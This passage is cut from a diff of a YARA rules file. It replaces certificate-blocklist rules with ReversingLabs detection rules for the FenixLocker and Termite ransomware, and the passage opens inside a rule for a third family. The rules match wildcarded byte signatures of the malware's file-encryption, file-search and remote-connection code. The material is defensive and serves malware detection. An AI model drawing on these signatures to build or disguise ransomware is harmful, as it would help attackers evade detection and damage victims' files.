+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FB ?? 74 ?? 85 DB 0F 85 ?? ?? ?? ?? 33
+            F6 8D 8C 24 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? BE ?? ?? ?? ?? 50
+            8D 44 24 ?? 8B D6 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B CE E8 ?? ?? ?? ?? 33 D2
+            8D 88 ?? ?? ?? ?? 8D 81 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8B 44 24 ?? C1 E8 ?? 89
+            44 24 ?? 83 C0 ?? 89 44 24 ?? 8B F0 8B C1 F7 F6 40 0F AF 44 24 ?? 50 6A ?? 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ??
+            8D 44 24 ?? 83 C4 ?? 81 C2 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 39 5C 24 ?? 76 ?? 8B 44 24 ?? 8D
+            54 24 ?? 8B 4C 24 ?? 2B C3 3B 44 24 ?? 0F 42 F0 8D 84 24 ?? ?? ?? ?? 50 8B 44 24 ??
+            8D 0C 39 68 ?? ?? ?? ?? 03 C3 56 50 E8 ?? ?? ?? ?? 03 7C 24 ?? 83 C4 ?? 03 DE 3B 7C
+            24 ?? 72 ?? 33 FF 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 83 FB ?? 74 ?? 85 DB 74 ?? 57 8D 44 24 ??
+            89 7C 24 ?? 8B 3D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D7 33 F6 8D 44
+        }
+		$encrypt_files_p2 = {
+            24 ?? 56 50 FF 74 24 ?? FF 74 24 ?? 53 FF D7 33 FF 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6
+            FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 50 FF D6 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 F6 56 53 FF 15 ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 76 ?? 39 35 ?? ?? ?? ?? 75 ?? 56 53 FF 15 ?? ?? ?? ?? 56 8B F8 B8 ?? ?? ??
+            ?? 56 50 53 2B F8 FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            56 8D 8C 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? 51 57 50 53 FF 15 ?? ?? ?? ?? 33 C0 50 50 50
+            53 FF 15 ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF
+            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? 89 5C 24 ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
+            50 FF 15
+        }
+		$find_files = {
+            53 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
+            ?? ?? 33 DB B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ??
+            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C3 EB ?? 1B C0 83
+            C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B
+            C3 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
+            A5 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 66 A5 6A ?? 59 BE ?? ?? ?? ?? 8D
+            BD ?? ?? ?? ?? F3 A5 66 A5 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 50 E8 ?? ??
+            ?? ?? 59 8B F0 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ??
+            ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ??
+            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? FF 75 ??
+            8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 75 ?? E9 ?? ?? ?? ?? FF 75 ?? E9 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 66 39 1F 0F 84
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" and 1594252801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6F8373Cf89F1B49138F4328118487F9E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Fenixlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FenixLocker ransomware."
 		author = "ReversingLabs"
-		id = "80c5d205-7f5e-5e06-b490-f33205154974"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "4868ced4-885d-548c-993c-ae25ab188172"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4986-L5002"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f926c2f73d47d463721a0cad48d9866192df55d71867941a40cba7e0b7725102"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.FenixLocker.yara#L1-L143"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "72712616df2c73c5c17696a7c5cb93f767910acf5f49cda27373fccfa29c5a4d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FenixLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B F1 E8 ?? ?? ?? ?? 83 C4
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B F8
+            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 72 ?? 8B 36 FF B5 ?? ?? ?? ?? 56 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 57 6A ?? 6A ?? 6A ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C3 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 01 8B C7 8B 4D ?? 5F 33 CD 5E E8 ??
+            ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_2 = {
+            B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75
+            ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 8D 55 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B F8 C6 45 ?? ?? 8B 4D ?? 8B 55 ?? 41 3B D1 77 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 55
+            ?? 8B 4D ?? 4A 8B 45 ?? 23 CA 03 C1 89 4D ?? 8B 4D ?? 23 D0 83 3C 91 ?? 8D 34 95 ??
+            ?? ?? ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 89 04 31 8B 4D ?? 8B 0C 31 85
+            C9 74 ?? 57 E8 ?? ?? ?? ?? FF 45 ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40
+            3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B
+            C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83
+            C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ??
+            ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F
+            87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ??
+            ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ??
+            0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
+            ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
+            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
+            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? 8B C2 83 C8 ?? 83 79 ??
+            ?? 0F 45 C2 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ??
+            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_3 = {
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4
+            ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ??
+            72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F
+            82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F
+            84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ??
+            83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ??
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D
+            45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            46 EB ?? 85 F6 75 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 45 F0 89 B5 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 40 3D ?? ?? ??
+            ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B
+            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_4 = {
+            8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72
+            ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 40 ??
+            F6 84 05 ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D
+            41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83
+            7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50
+        }
+		$encrypt_files_5 = {
+            FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ??
+            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C3 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ??
+            ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF
+            B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 46 89 B5 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ??
+            40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ??
+            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "30 PTY LTD" and pe.signatures [ i ] . serial == "6f:83:73:cf:89:f1:b4:91:38:f4:32:81:18:48:7f:9e" and 1572566400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $encrypt_files_1 and $encrypt_files_2 and $encrypt_files_3 ) or ( $encrypt_files_1 and $encrypt_files_4 and $encrypt_files_5 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_E38259Cf24Cc702Ce441B683Ad578911 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Termite : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Termite ransomware."
 		author = "ReversingLabs"
-		id = "fc5df86f-b8c9-58b1-bd41-e03ed50829dd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "350011fa-1e3c-5079-8fe7-968340a3aca0"
+		date = "2020-08-31"
+		modified = "2020-08-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5004-L5022"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2428df14a18f4aed1a3db85c1fb43a847fae8a922c6dc948f3bc514dc4cae09c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Termite.yara#L1-L151"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "df273de81fc58cb0bacf021ee539ec6dbfa1f1a3e13bd46519ee313595cafb4c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Termite"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
